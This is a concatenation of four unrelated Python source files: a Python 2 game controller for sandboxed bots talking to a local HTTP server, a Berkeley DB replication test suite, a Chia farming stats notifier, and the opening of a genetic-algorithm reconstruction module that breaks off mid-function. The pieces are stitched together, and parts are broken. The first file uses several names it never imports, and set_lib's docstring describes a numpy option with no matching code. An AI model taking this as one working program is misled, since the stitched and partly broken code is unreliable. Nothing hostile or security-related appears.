from SocketServer import ThreadingMixIn
import threading
import uuid
import json
from multiprocessing import Queue, Event, Process
from .playercontroller import SandboxedPlayerController
from .exceptions import GameFinishedException, GameLogicException, TimeoutException
def get_cookie():
    """Return a random 8-character lowercase-hex identifier."""
    return uuid.uuid4().hex[:8]
class GameControllerHTTPRequestHandler(BaseHTTPRequestHandler):
    """HTTP endpoint through which sandboxed player bots submit their turns."""
    def log_message(self, format, *args):
        # Silence the default per-request stderr logging.
        return
    def do_POST(self):
        """Read a JSON body, hand it to the game controller, answer
        200 when the controller returns 0 and 501 otherwise; the
        controller's return value is echoed back as JSON either way."""
        content_len = int(self.headers.getheader('content-length'))
        post_body = self.rfile.read(content_len)
        # Parse content
        data = json.loads(post_body)
        bot_cookie = data["BOT_COOKIE"]
        # Handle the bot controller request
        ret = self.server.game_controller.handle_player_request(data, bot_cookie)
        if ret == 0:
            self.send_response(200)
        else:
            self.send_response(501)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(json.dumps(ret))
        return
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
    """Handle requests in a separate thread.

    ThreadingMixIn makes every incoming request run in its own thread,
    so one blocked bot request cannot stall the whole server loop.
    """
class BaseGameController:
    """Drive a turn-based game between sandboxed player processes.

    Players run in separate processes (see run_player_process) and answer
    turns over HTTP via GameControllerHTTPRequestHandler.  Subclasses
    implement evaluate_turn() and get_turn_data().  Written for Python 2
    (old-style except syntax, BaseHTTPServer imports).
    """
    def __init__(self):
        self._server = None
        self._server_thread = None
        self.server_host = "localhost"
        self.server_port = 0        # picked by the OS when the server starts
        self.rounds = 100
        self.current_round = 0
        self.players = {}           # bot_cookie -> player bookkeeping dict
        self.finish_game_event = Event()
        self._exception = None      # (exception_class, message) re-raised at the end of run()
        self._bot_in_turn = None    # cookie of the bot currently allowed to act
        self.turns_queue = Queue()
        self.std_out_queue = Queue()
        self.stop_event = Event()
    def log_msg(self, msg):
        # All output is funneled through a queue and printed by run_stdout_thread.
        self.std_out_queue.put(msg)
    def handle_player_request(self, data, bot_cookie):
        """Evaluate a bot's turn request.

        Returns evaluate_turn()'s result for an in-turn bot, -1 for an
        out-of-turn request.  Game-logic errors stop the game and are
        recorded in self._exception for run() to re-raise.
        """
        if self.players[bot_cookie]["turn_event"].is_set() and self._bot_in_turn == bot_cookie:
            try:
                ret = self.evaluate_turn(data, bot_cookie)
                return ret
            except Exception, e:
                # Error in game logic
                self.log_msg("GAME LOGIC ERROR: " + str(e))
                self.stop()
                self._exception = (GameLogicException, str(e))
            finally:
                # The turn is consumed regardless of the outcome.
                self.players[bot_cookie]["turn_event"].clear()
                self._bot_in_turn = None
        else:
            # Wrong turn!
            self.log_msg("WRONG TURN FROM BOT %s" % bot_cookie)
            return -1
    def evaluate_turn(self, player, request):
        # Subclasses implement the actual game rules here.
        # NOTE(review): callers invoke this as evaluate_turn(data, bot_cookie),
        # so the parameter names (player, request) look swapped/misnamed —
        # confirm against the subclass implementations.
        raise NotImplementedError
    def _start_http_server(self):
        """Start the threaded HTTP server on an OS-assigned port."""
        self._server = ThreadedHTTPServer((self.server_host, 0), GameControllerHTTPRequestHandler)
        self.server_port = self._server.server_port
        self._server.game_controller = self
        self.log_msg("Starting http server server..")
        self._server_thread = threading.Thread(target=self._server.serve_forever)
        # Exit the server thread when the main thread terminates
        self._server_thread.daemon = True
        self._server_thread.start()
        self.log_msg("Server loop running in thread: %s PORT: %s" % (self._server_thread.name, self.server_port))
    def add_player(self, player_id, player_script):
        """Register a player script under a fresh bot cookie."""
        bot_cookie = get_cookie()
        turn_event = Event()
        connected_event = Event()
        main_queue = Queue()
        self.players[bot_cookie] = {"player_id": player_id,
                                    "bot_cookie": bot_cookie,
                                    "player_script": player_script,
                                    "turn_event": turn_event,
                                    "connected_event": connected_event,
                                    "main_queue": main_queue}
    def run_player_process(self, player_d, p_k):
        """Entry point of a player's sandbox process."""
        p = SandboxedPlayerController(player_d["player_id"], os.path.abspath(player_d["player_script"]),
                                      player_d["bot_cookie"], player_d["turn_event"],
                                      player_d["connected_event"], player_d["main_queue"],
                                      self.std_out_queue, self.server_port)
        p.run_process()
    def run_stdout_thread(self):
        """Start a daemon thread draining std_out_queue to stdout."""
        def _print_queue():
            while True:
                while not self.std_out_queue.empty():
                    print(self.std_out_queue.get())
                if self.stop_event.is_set():
                    break
                time.sleep(0.05)
        stdout_thread = threading.Thread(target=_print_queue)
        # Exit the server thread when the main thread terminates
        stdout_thread.daemon = True
        stdout_thread.start()
    def get_turn_data(self, bot_cookie):
        # Subclasses return the per-turn payload sent to the bot.
        return None
    def stop(self):
        self.finish_game_event.set()
    def raise_if_stopped(self):
        if self.finish_game_event.is_set():
            raise GameFinishedException
    def _start_rounds(self):
        """Run the round loop, giving each player one turn per round."""
        self.log_msg("Starting rounds")
        try:
            for i in range(0, self.rounds):
                self.current_round = i
                self.raise_if_stopped()
                self.log_msg("\n\nStarting round %s\n" % str(i))
                for p_k in self.players.keys():
                    self.raise_if_stopped()
                    turn_cookie = get_cookie()
                    self.log_msg("\n===== STARTED TURN %s FOR BOT %s" % (turn_cookie, self.players[p_k]["bot_cookie"]))
                    self._bot_in_turn = p_k
                    self.players[p_k]["turn_event"].set()
                    try:
                        turn_data = {"MSG": "TURN",
                                     "DATA": self.get_turn_data(p_k),
                                     "TURN_COOKIE": turn_cookie}
                        self.players[p_k]["main_queue"].put(json.dumps(turn_data))
                    except Exception, e:
                        raise GameLogicException("Turn data error %s" % str(e))
                    # Wait for the player to finish the turn...
                    # (handle_player_request clears turn_event on completion;
                    # ~2 seconds budget per turn.)
                    max_wait = 2
                    while self.players[p_k]["turn_event"].is_set():
                        if max_wait < 1:
                            self.players[p_k]["main_queue"].put(json.dumps({"MSG": "KILL"}))
                            raise GameFinishedException("Player %s turn timeout." % self.players[p_k]['player_id'])
                        else:
                            sleep_time = 0.02
                            max_wait -= sleep_time
                            # turn based timeout check could go here
                            time.sleep(sleep_time)
                    self._bot_in_turn = None
                    self.log_msg("===== ENDED TURN %s FOR BOT %s" % (turn_cookie, self.players[p_k]["bot_cookie"]))
        except GameFinishedException, e:
            self.log_msg("FINISHED GAME")
        except GameLogicException, e:
            self.log_msg("GAME ERROR")
            self._exception = (GameLogicException, str(e))
    def run(self):
        """Start the server and all players, play the rounds, shut down.

        Re-raises any recorded exception (timeout / game-logic error)
        after cleanup.
        """
        self._start_http_server()
        self.run_stdout_thread()
        startup_okay = True
        # Start all the sandbox processes
        for p_k in self.players.keys():
            self.log_msg("Starting player..")
            p = Process(target=self.run_player_process, args=(self.players[p_k], p_k))
            p.start()
            # Wait for the sandbox process to connect to the controller.
            max_wait = 3
            connected = True
            while not self.players[p_k]["connected_event"].is_set():
                if max_wait < 1 or not p.is_alive():
                    connected = False
                    break
                sleep_time = 0.05
                max_wait -= sleep_time
                time.sleep(sleep_time)
            if connected:
                self.log_msg("Player %s connected" % self.players[p_k]["bot_cookie"])
            else:
                # player couldn't connect
                startup_okay = False
                err_msg = "Player %s didn't connect in time." % self.players[p_k]['player_id']
                self.log_msg(err_msg)
                self.players[p_k]["main_queue"].put(json.dumps({"MSG": "KILL"}))
                self._exception = (TimeoutException, err_msg)
                break
        if startup_okay:
            self._start_rounds()
        else:
            self.stop()
        # Tell every player process to quit cleanly.
        for p_k in self.players.keys():
            self.players[p_k]["main_queue"].put(json.dumps({"MSG": "QUIT"}))
        self.log_msg("\nCLOSING..")
        # Exit
        self.log_msg("Shutting down http server...")
        time.sleep(2)
        self._server.shutdown()
        self.stop_event.set()
        if self._exception:
            raise self._exception[0](self._exception[1])
|
test_replication.py | """TestCases for distributed transactions.
"""
import os
import time
import unittest
from .test_all import db, test_support, have_threads, verbose, \
get_new_environment_path, get_new_database_path
#----------------------------------------------------------------------
class DBReplicationManager(unittest.TestCase):
    """Replication tests driven by Berkeley DB's Replication Manager
    (repmgr), which runs its own service threads inside the library."""
    import sys
    if sys.version_info[:3] < (2, 4, 0):
        # Backport assertTrue for Python < 2.4.
        def assertTrue(self, expr, msg=None):
            self.failUnless(expr,msg=msg)

    def setUp(self) :
        self.homeDirMaster = get_new_environment_path()
        self.homeDirClient = get_new_environment_path()
        self.dbenvMaster = db.DBEnv()
        self.dbenvClient = db.DBEnv()
        # Must use "DB_THREAD" because the Replication Manager will
        # be executed in other threads but will use the same environment.
        # http://forums.oracle.com/forums/thread.jspa?threadID=645788&tstart=0
        self.dbenvMaster.open(self.homeDirMaster, db.DB_CREATE | db.DB_INIT_TXN
                | db.DB_INIT_LOG | db.DB_INIT_MPOOL | db.DB_INIT_LOCK |
                db.DB_INIT_REP | db.DB_RECOVER | db.DB_THREAD, 0o666)
        self.dbenvClient.open(self.homeDirClient, db.DB_CREATE | db.DB_INIT_TXN
                | db.DB_INIT_LOG | db.DB_INIT_MPOOL | db.DB_INIT_LOCK |
                db.DB_INIT_REP | db.DB_RECOVER | db.DB_THREAD, 0o666)
        self.confirmed_master=self.client_startupdone=False
        # Event callbacks flip the flags above once replication is up.
        def confirmed_master(a,b,c) :
            if b==db.DB_EVENT_REP_MASTER :
                self.confirmed_master=True
        def client_startupdone(a,b,c) :
            if b==db.DB_EVENT_REP_STARTUPDONE :
                self.client_startupdone=True
        self.dbenvMaster.set_event_notify(confirmed_master)
        self.dbenvClient.set_event_notify(client_startupdone)
        #self.dbenvMaster.set_verbose(db.DB_VERB_REPLICATION, True)
        #self.dbenvMaster.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
        #self.dbenvClient.set_verbose(db.DB_VERB_REPLICATION, True)
        #self.dbenvClient.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
        self.dbMaster = self.dbClient = None

    def tearDown(self):
        if self.dbClient :
            self.dbClient.close()
        if self.dbMaster :
            self.dbMaster.close()
        self.dbenvClient.close()
        self.dbenvMaster.close()
        test_support.rmtree(self.homeDirClient)
        test_support.rmtree(self.homeDirMaster)

    def test01_basic_replication(self) :
        """Start a master/client pair and check a put/delete round-trips."""
        master_port = test_support.find_unused_port()
        self.dbenvMaster.repmgr_set_local_site("127.0.0.1", master_port)
        client_port = test_support.find_unused_port()
        self.dbenvClient.repmgr_set_local_site("127.0.0.1", client_port)
        self.dbenvMaster.repmgr_add_remote_site("127.0.0.1", client_port)
        self.dbenvClient.repmgr_add_remote_site("127.0.0.1", master_port)
        self.dbenvMaster.rep_set_nsites(2)
        self.dbenvClient.rep_set_nsites(2)
        # Priority 0 keeps the client from ever winning an election.
        self.dbenvMaster.rep_set_priority(10)
        self.dbenvClient.rep_set_priority(0)
        self.dbenvMaster.rep_set_timeout(db.DB_REP_CONNECTION_RETRY,100123)
        self.dbenvClient.rep_set_timeout(db.DB_REP_CONNECTION_RETRY,100321)
        self.assertEquals(self.dbenvMaster.rep_get_timeout(
            db.DB_REP_CONNECTION_RETRY), 100123)
        self.assertEquals(self.dbenvClient.rep_get_timeout(
            db.DB_REP_CONNECTION_RETRY), 100321)
        self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 100234)
        self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 100432)
        self.assertEquals(self.dbenvMaster.rep_get_timeout(
            db.DB_REP_ELECTION_TIMEOUT), 100234)
        self.assertEquals(self.dbenvClient.rep_get_timeout(
            db.DB_REP_ELECTION_TIMEOUT), 100432)
        self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_RETRY, 100345)
        self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_RETRY, 100543)
        self.assertEquals(self.dbenvMaster.rep_get_timeout(
            db.DB_REP_ELECTION_RETRY), 100345)
        self.assertEquals(self.dbenvClient.rep_get_timeout(
            db.DB_REP_ELECTION_RETRY), 100543)
        self.dbenvMaster.repmgr_set_ack_policy(db.DB_REPMGR_ACKS_ALL)
        self.dbenvClient.repmgr_set_ack_policy(db.DB_REPMGR_ACKS_ALL)
        self.dbenvMaster.repmgr_start(1, db.DB_REP_MASTER);
        self.dbenvClient.repmgr_start(1, db.DB_REP_CLIENT);
        self.assertEquals(self.dbenvMaster.rep_get_nsites(),2)
        self.assertEquals(self.dbenvClient.rep_get_nsites(),2)
        self.assertEquals(self.dbenvMaster.rep_get_priority(),10)
        self.assertEquals(self.dbenvClient.rep_get_priority(),0)
        self.assertEquals(self.dbenvMaster.repmgr_get_ack_policy(),
                db.DB_REPMGR_ACKS_ALL)
        self.assertEquals(self.dbenvClient.repmgr_get_ack_policy(),
                db.DB_REPMGR_ACKS_ALL)
        # The timeout is necessary in BDB 4.5, since DB_EVENT_REP_STARTUPDONE
        # is not generated if the master has no new transactions.
        # This is solved in BDB 4.6 (#15542).
        import time
        timeout = time.time()+10
        while (time.time()<timeout) and not (self.confirmed_master and self.client_startupdone) :
            time.sleep(0.02)
        self.assertTrue(time.time()<timeout)
        d = self.dbenvMaster.repmgr_site_list()
        self.assertEquals(len(d), 1)
        self.assertEquals(d[0][0], "127.0.0.1")
        self.assertEquals(d[0][1], client_port)
        self.assertTrue((d[0][2]==db.DB_REPMGR_CONNECTED) or \
                (d[0][2]==db.DB_REPMGR_DISCONNECTED))
        d = self.dbenvClient.repmgr_site_list()
        self.assertEquals(len(d), 1)
        self.assertEquals(d[0][0], "127.0.0.1")
        self.assertEquals(d[0][1], master_port)
        self.assertTrue((d[0][2]==db.DB_REPMGR_CONNECTED) or \
                (d[0][2]==db.DB_REPMGR_DISCONNECTED))
        if db.version() >= (4,6) :
            d = self.dbenvMaster.repmgr_stat(flags=db.DB_STAT_CLEAR);
            self.assertTrue("msgs_queued" in d)
        self.dbMaster=db.DB(self.dbenvMaster)
        txn=self.dbenvMaster.txn_begin()
        self.dbMaster.open("test", db.DB_HASH, db.DB_CREATE, 0o666, txn=txn)
        txn.commit()
        import time,os.path
        timeout=time.time()+10
        # Wait for the database file to appear on the client side.
        while (time.time()<timeout) and \
                not (os.path.exists(os.path.join(self.homeDirClient,"test"))) :
            time.sleep(0.01)
        self.dbClient=db.DB(self.dbenvClient)
        while True :
            txn=self.dbenvClient.txn_begin()
            try :
                self.dbClient.open("test", db.DB_HASH, flags=db.DB_RDONLY,
                        mode=0o666, txn=txn)
            except db.DBRepHandleDeadError :
                # Replication invalidated the handle; retry with a fresh one.
                txn.abort()
                self.dbClient.close()
                self.dbClient=db.DB(self.dbenvClient)
                continue
            txn.commit()
            break
        txn=self.dbenvMaster.txn_begin()
        self.dbMaster.put("ABC", "123", txn=txn)
        txn.commit()
        import time
        timeout=time.time()+10
        v=None
        # Poll until the put replicates to the client.
        while (time.time()<timeout) and (v==None) :
            txn=self.dbenvClient.txn_begin()
            v=self.dbClient.get("ABC", txn=txn)
            txn.commit()
            if v==None :
                time.sleep(0.02)
        self.assertTrue(time.time()<timeout)
        self.assertEquals("123", v)
        txn=self.dbenvMaster.txn_begin()
        self.dbMaster.delete("ABC", txn=txn)
        txn.commit()
        timeout=time.time()+10
        # Poll until the delete replicates.
        # NOTE(review): the sleep guard below looks inverted (sleeps only
        # when v is already None, i.e. when the loop is about to exit), so
        # this loop busy-spins while waiting — confirm intent.
        while (time.time()<timeout) and (v!=None) :
            txn=self.dbenvClient.txn_begin()
            v=self.dbClient.get("ABC", txn=txn)
            txn.commit()
            if v==None :
                time.sleep(0.02)
        self.assertTrue(time.time()<timeout)
        self.assertEquals(None, v)
class DBBaseReplication(DBReplicationManager):
    """Replication tests using the Base replication API: message transport
    is done by hand through two queues serviced by our own threads."""
    def setUp(self) :
        DBReplicationManager.setUp(self)
        # Override the event callbacks: with the Base API the master can
        # also be confirmed by winning an election.
        def confirmed_master(a,b,c) :
            if (b == db.DB_EVENT_REP_MASTER) or (b == db.DB_EVENT_REP_ELECTED) :
                self.confirmed_master = True
        def client_startupdone(a,b,c) :
            if b == db.DB_EVENT_REP_STARTUPDONE :
                self.client_startupdone = True
        self.dbenvMaster.set_event_notify(confirmed_master)
        self.dbenvClient.set_event_notify(client_startupdone)
        import queue
        self.m2c = queue.Queue()
        self.c2m = queue.Queue()
        # There are only two nodes, so we don't need to
        # do any routing decision
        def m2c(dbenv, control, rec, lsnp, envid, flags) :
            self.m2c.put((control, rec))
        def c2m(dbenv, control, rec, lsnp, envid, flags) :
            self.c2m.put((control, rec))
        self.dbenvMaster.rep_set_transport(13,m2c)
        self.dbenvMaster.rep_set_priority(10)
        self.dbenvClient.rep_set_transport(3,c2m)
        self.dbenvClient.rep_set_priority(0)
        self.assertEquals(self.dbenvMaster.rep_get_priority(),10)
        self.assertEquals(self.dbenvClient.rep_get_priority(),0)
        #self.dbenvMaster.set_verbose(db.DB_VERB_REPLICATION, True)
        #self.dbenvMaster.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
        #self.dbenvClient.set_verbose(db.DB_VERB_REPLICATION, True)
        #self.dbenvClient.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
        # Message-pump threads; the actual loop body (self.thread_do) is
        # installed later by each test before the threads are started.
        def thread_master() :
            return self.thread_do(self.dbenvMaster, self.c2m, 3,
                    self.master_doing_election, True)
        def thread_client() :
            return self.thread_do(self.dbenvClient, self.m2c, 13,
                    self.client_doing_election, False)
        from threading import Thread
        t_m=Thread(target=thread_master)
        t_c=Thread(target=thread_client)
        import sys
        if sys.version_info[0] < 3 :
            t_m.setDaemon(True)
            t_c.setDaemon(True)
        else :
            t_m.daemon = True
            t_c.daemon = True
        self.t_m = t_m
        self.t_c = t_c
        self.dbMaster = self.dbClient = None
        # One-element lists so the message threads can mutate the flags.
        self.master_doing_election=[False]
        self.client_doing_election=[False]

    def tearDown(self):
        if self.dbClient :
            self.dbClient.close()
        if self.dbMaster :
            self.dbMaster.close()
        # A None message tells each transport thread to exit.
        self.m2c.put(None)
        self.c2m.put(None)
        self.t_m.join()
        self.t_c.join()
        self.dbenvClient.close()
        self.dbenvMaster.close()
        test_support.rmtree(self.homeDirClient)
        test_support.rmtree(self.homeDirMaster)

    def basic_rep_threading(self) :
        # Start replication with fixed roles and launch the two
        # message-pump threads with a simple forward-everything loop.
        self.dbenvMaster.rep_start(flags=db.DB_REP_MASTER)
        self.dbenvClient.rep_start(flags=db.DB_REP_CLIENT)
        def thread_do(env, q, envid, election_status, must_be_master) :
            while True :
                v=q.get()
                if v == None : return
                env.rep_process_message(v[0], v[1], envid)
        self.thread_do = thread_do
        self.t_m.start()
        self.t_c.start()

    def test01_basic_replication(self) :
        """Same put/delete round-trip as the repmgr test, via the Base API."""
        self.basic_rep_threading()
        # The timeout is necessary in BDB 4.5, since DB_EVENT_REP_STARTUPDONE
        # is not generated if the master has no new transactions.
        # This is solved in BDB 4.6 (#15542).
        import time
        timeout = time.time()+10
        while (time.time()<timeout) and not (self.confirmed_master and
                self.client_startupdone) :
            time.sleep(0.02)
        self.assertTrue(time.time()<timeout)
        self.dbMaster=db.DB(self.dbenvMaster)
        txn=self.dbenvMaster.txn_begin()
        self.dbMaster.open("test", db.DB_HASH, db.DB_CREATE, 0o666, txn=txn)
        txn.commit()
        import time,os.path
        timeout=time.time()+10
        # Wait for the database file to appear on the client side.
        while (time.time()<timeout) and \
                not (os.path.exists(os.path.join(self.homeDirClient,"test"))) :
            time.sleep(0.01)
        self.dbClient=db.DB(self.dbenvClient)
        while True :
            txn=self.dbenvClient.txn_begin()
            try :
                self.dbClient.open("test", db.DB_HASH, flags=db.DB_RDONLY,
                        mode=0o666, txn=txn)
            except db.DBRepHandleDeadError :
                # Replication invalidated the handle; retry with a fresh one.
                txn.abort()
                self.dbClient.close()
                self.dbClient=db.DB(self.dbenvClient)
                continue
            txn.commit()
            break
        d = self.dbenvMaster.rep_stat(flags=db.DB_STAT_CLEAR);
        self.assertTrue("master_changes" in d)
        txn=self.dbenvMaster.txn_begin()
        self.dbMaster.put("ABC", "123", txn=txn)
        txn.commit()
        import time
        timeout=time.time()+10
        v=None
        # Poll until the put replicates to the client.
        while (time.time()<timeout) and (v==None) :
            txn=self.dbenvClient.txn_begin()
            v=self.dbClient.get("ABC", txn=txn)
            txn.commit()
            if v==None :
                time.sleep(0.02)
        self.assertTrue(time.time()<timeout)
        self.assertEquals("123", v)
        txn=self.dbenvMaster.txn_begin()
        self.dbMaster.delete("ABC", txn=txn)
        txn.commit()
        timeout=time.time()+10
        # Poll until the delete replicates.
        while (time.time()<timeout) and (v!=None) :
            txn=self.dbenvClient.txn_begin()
            v=self.dbClient.get("ABC", txn=txn)
            txn.commit()
            if v==None :
                time.sleep(0.02)
        self.assertTrue(time.time()<timeout)
        self.assertEquals(None, v)

    if db.version() >= (4,7) :
        def test02_test_request(self) :
            """rep_set_request/rep_get_request round-trip."""
            self.basic_rep_threading()
            (minimum, maximum) = self.dbenvClient.rep_get_request()
            self.dbenvClient.rep_set_request(minimum-1, maximum+1)
            self.assertEqual(self.dbenvClient.rep_get_request(),
                    (minimum-1, maximum+1))

    if db.version() >= (4,6) :
        def test03_master_election(self) :
            """Both sites start as clients; an election promotes the master."""
            # Get ready to hold an election
            #self.dbenvMaster.rep_start(flags=db.DB_REP_MASTER)
            self.dbenvMaster.rep_start(flags=db.DB_REP_CLIENT)
            self.dbenvClient.rep_start(flags=db.DB_REP_CLIENT)
            def thread_do(env, q, envid, election_status, must_be_master) :
                # Message pump that also reacts to HOLDELECTION requests by
                # spawning an election thread (at most one at a time).
                while True :
                    v=q.get()
                    if v == None : return
                    r = env.rep_process_message(v[0],v[1],envid)
                    if must_be_master and self.confirmed_master :
                        self.dbenvMaster.rep_start(flags = db.DB_REP_MASTER)
                        must_be_master = False
                    if r[0] == db.DB_REP_HOLDELECTION :
                        def elect() :
                            while True :
                                try :
                                    env.rep_elect(2, 1)
                                    election_status[0] = False
                                    break
                                except db.DBRepUnavailError :
                                    pass
                        if not election_status[0] and not self.confirmed_master :
                            from threading import Thread
                            election_status[0] = True
                            t=Thread(target=elect)
                            import sys
                            if sys.version_info[0] < 3 :
                                t.setDaemon(True)
                            else :
                                t.daemon = True
                            t.start()
            self.thread_do = thread_do
            self.t_m.start()
            self.t_c.start()
            self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 50000)
            self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 50000)
            self.client_doing_election[0] = True
            # Keep calling the election until enough sites participate.
            while True :
                try :
                    self.dbenvClient.rep_elect(2, 1)
                    self.client_doing_election[0] = False
                    break
                except db.DBRepUnavailError :
                    pass
            self.assertTrue(self.confirmed_master)

    if db.version() >= (4,7) :
        def test04_test_clockskew(self) :
            """rep_set_clockskew/rep_get_clockskew round-trip."""
            fast, slow = 1234, 1230
            self.dbenvMaster.rep_set_clockskew(fast, slow)
            self.assertEqual((fast, slow),
                    self.dbenvMaster.rep_get_clockskew())
            self.basic_rep_threading()
#----------------------------------------------------------------------
def test_suite():
    """Build the suite of replication tests supported by this BDB build.

    Replication Manager tests need BDB >= 4.6 and a library compiled with
    repmgr support (probed by calling repmgr_get_ack_policy); the Base-API
    replication tests additionally require threading support.
    """
    suite = unittest.TestSuite()
    if db.version() >= (4, 6) :
        dbenv = db.DBEnv()
        try :
            dbenv.repmgr_get_ack_policy()
            ReplicationManager_available=True
        # Narrowed from a bare "except:" so KeyboardInterrupt/SystemExit
        # are not swallowed; any library-level failure still means
        # "repmgr not available".
        except Exception :
            ReplicationManager_available=False
        dbenv.close()
        del dbenv
        if ReplicationManager_available :
            suite.addTest(unittest.makeSuite(DBReplicationManager))
        if have_threads :
            suite.addTest(unittest.makeSuite(DBBaseReplication))
    return suite
if __name__ == '__main__':
    # Run the replication suite directly.
    unittest.main(defaultTest='test_suite')
|
stats_manager.py | # std
import logging
import re
from datetime import datetime, timedelta
from typing import cast, List, Union
from threading import Thread
from time import sleep
# project
from . import (
HarvesterActivityConsumer,
PartialConsumer,
BlockConsumer,
WalletAddedCoinConsumer,
FinishedSignageConsumer,
)
from .stat_accumulators.eligible_plots_stats import EligiblePlotsStats
from .stat_accumulators.wallet_added_coin_stats import WalletAddedCoinStats
from .stat_accumulators.search_time_stats import SearchTimeStats
from .stat_accumulators.signage_point_stats import SignagePointStats
from .stat_accumulators.found_proof_stats import FoundProofStats
from .stat_accumulators.number_plots_stats import NumberPlotsStats
from .stat_accumulators.found_partial_stats import FoundPartialStats
from .stat_accumulators.found_block_stats import FoundBlockStats
from src.chia_log.parsers.wallet_added_coin_parser import WalletAddedCoinMessage
from src.chia_log.parsers.harvester_activity_parser import HarvesterActivityMessage
from src.chia_log.parsers.finished_signage_point_parser import FinishedSignagePointMessage
from src.chia_log.parsers.partial_parser import PartialMessage
from src.chia_log.parsers.block_parser import BlockMessage
from src.notifier.notify_manager import NotifyManager
from src.notifier import Event, EventType, EventPriority, EventService
class StatsManager:
    """Manage all stat accumulators and trigger daily notification to the user
    with a summary from all stats that have been collected for the past 24 hours.
    """

    def __init__(self, config: dict, notify_manager: "NotifyManager"):
        """Read the summary schedule from *config* and, when enabled, start the
        background thread that periodically fires the summary notification.

        config keys: "enable" (bool), "time_of_day" ("HH:MM" or hour int),
        "frequency_hours" (int).
        """
        self._enable = config.get("enable", False)
        self._notify_time = self._parse_notify_time(config.get("time_of_day", "21:00"))
        self._frequency_hours = config.get("frequency_hours", 24)
        if not self._enable:
            logging.warning("Disabled stats and daily notifications")
            return
        logging.info("Enabled stats for daily notifications")
        self._notify_manager = notify_manager
        self._stat_accumulators = [
            WalletAddedCoinStats(),
            FoundProofStats(),
            FoundPartialStats(),
            FoundBlockStats(),
            SearchTimeStats(),
            NumberPlotsStats(),
            EligiblePlotsStats(),
            SignagePointStats(),
        ]
        logging.info(
            f"Summary notifications will be sent out every {self._frequency_hours} "
            f"hours starting from {self._notify_time['hour']:02d}:{self._notify_time['minute']:02d}"
        )
        # First summary fires at the next occurrence of the configured time.
        self._datetime_next_summary = datetime.now().replace(
            hour=self._notify_time["hour"], minute=self._notify_time["minute"], second=0, microsecond=0
        )
        while datetime.now() > self._datetime_next_summary:
            self._datetime_next_summary += timedelta(hours=self._frequency_hours)
        # Start thread
        self._is_running = True
        self._thread = Thread(target=self._run_loop)
        self._thread.start()

    def _consume(self, objects: List, consumer_type: type) -> None:
        """Forward every object to each accumulator implementing *consumer_type*.

        Shared implementation behind all public consume_* methods; no-op
        when stats are disabled.
        """
        if not self._enable:
            return
        for stat_acc in self._stat_accumulators:
            if isinstance(stat_acc, consumer_type):
                for obj in objects:
                    stat_acc.consume(obj)

    def consume_wallet_messages(self, objects: "List[WalletAddedCoinMessage]"):
        """Feed wallet added-coin messages to the matching accumulators."""
        self._consume(objects, WalletAddedCoinConsumer)

    def consume_harvester_messages(self, objects: "List[HarvesterActivityMessage]"):
        """Feed harvester activity messages to the matching accumulators."""
        self._consume(objects, HarvesterActivityConsumer)

    def consume_partial_messages(self, objects: "List[PartialMessage]"):
        """Feed pool-partial messages to the matching accumulators."""
        self._consume(objects, PartialConsumer)

    def consume_block_messages(self, objects: "List[BlockMessage]"):
        """Feed found-block messages to the matching accumulators."""
        self._consume(objects, BlockConsumer)

    def consume_signage_point_messages(self, objects: "List[FinishedSignagePointMessage]"):
        """Feed finished-signage-point messages to the matching accumulators."""
        self._consume(objects, FinishedSignageConsumer)

    def _send_daily_notification(self):
        """Build one summary from all accumulators, send it, and reset them."""
        # Plain string — the original used an f-string with no placeholders.
        summary = "Howdy farmer! :farmer:\nHow's the farm? :seedling:\n"
        for stat_acc in self._stat_accumulators:
            summary += "\n" + stat_acc.get_summary()
            stat_acc.reset()
        self._notify_manager.process_events(
            [Event(type=EventType.DAILY_STATS, priority=EventPriority.LOW, service=EventService.DAILY, message=summary)]
        )

    def _run_loop(self):
        """Background loop: fire the summary whenever its deadline passes."""
        while self._is_running:
            if datetime.now() > self._datetime_next_summary:
                self._send_daily_notification()
                self._datetime_next_summary += timedelta(hours=self._frequency_hours)
            sleep(1)

    def stop(self):
        """Ask the background loop to exit (takes effect within ~1 second)."""
        self._is_running = False

    def _parse_notify_time(self, value: Union[str, int], default: Union[dict, None] = None) -> dict:
        """Parse *value* ("HH:MM" string or bare hour int) into
        {"hour": h, "minute": m}; fall back to *default* (21:00) when invalid.

        The default is created per call (sentinel None) instead of a shared
        mutable default argument.
        """
        if default is None:
            default = {"hour": 21, "minute": 0}
        if isinstance(value, int):
            return {"hour": value, "minute": 0}
        value = cast(str, value)
        # fullmatch (with capturing groups) rejects trailing junk such as
        # "21:005", which the previous prefix re.match silently accepted.
        match = re.fullmatch(r"([01]\d|2[0-3]):([0-5]\d)", value)
        if match:
            return {"hour": int(match.group(1)), "minute": int(match.group(2))}
        return default
|
reconstruction_GA.py | # #########################################################################
# Copyright (c) , UChicago Argonne, LLC. All rights reserved. #
# #
# See LICENSE file. #
# #########################################################################
"""
This module controls the genetic algoritm process.
"""
import numpy as np
import os
import cohere.controller.reconstruction_multi as multi
import cohere.utilities.utils as ut
from multiprocessing import Process, Queue
import shutil
import importlib
import cohere.controller.phasing as calc
__author__ = "Barbara Frosik"
__copyright__ = "Copyright (c) 2016, UChicago Argonne, LLC."
__docformat__ = 'restructuredtext en'
__all__ = ['reconstruction']
def set_lib(pkg, ndim=None):
    """Select the device/compute backend and register it with the phasing module.

    pkg: 'af' (arrayfire, dimension-specific), 'cp' (cupy) or 'np' (numpy).
    ndim: required for 'af'; chooses the 1/2/3-dimensional arrayfire wrapper.
    Raises NotImplementedError for 'af' with an unsupported ndim.
    """
    global dvclib
    if pkg == 'af':
        # Arrayfire wrappers are dimension-specific: aflib1 / aflib2 / aflib3.
        if ndim not in (1, 2, 3):
            raise NotImplementedError
        dvclib = getattr(importlib.import_module('cohere.lib.aflib'),
                         'aflib{}'.format(ndim))
    elif pkg == 'cp':
        dvclib = importlib.import_module('cohere.lib.cplib').cplib
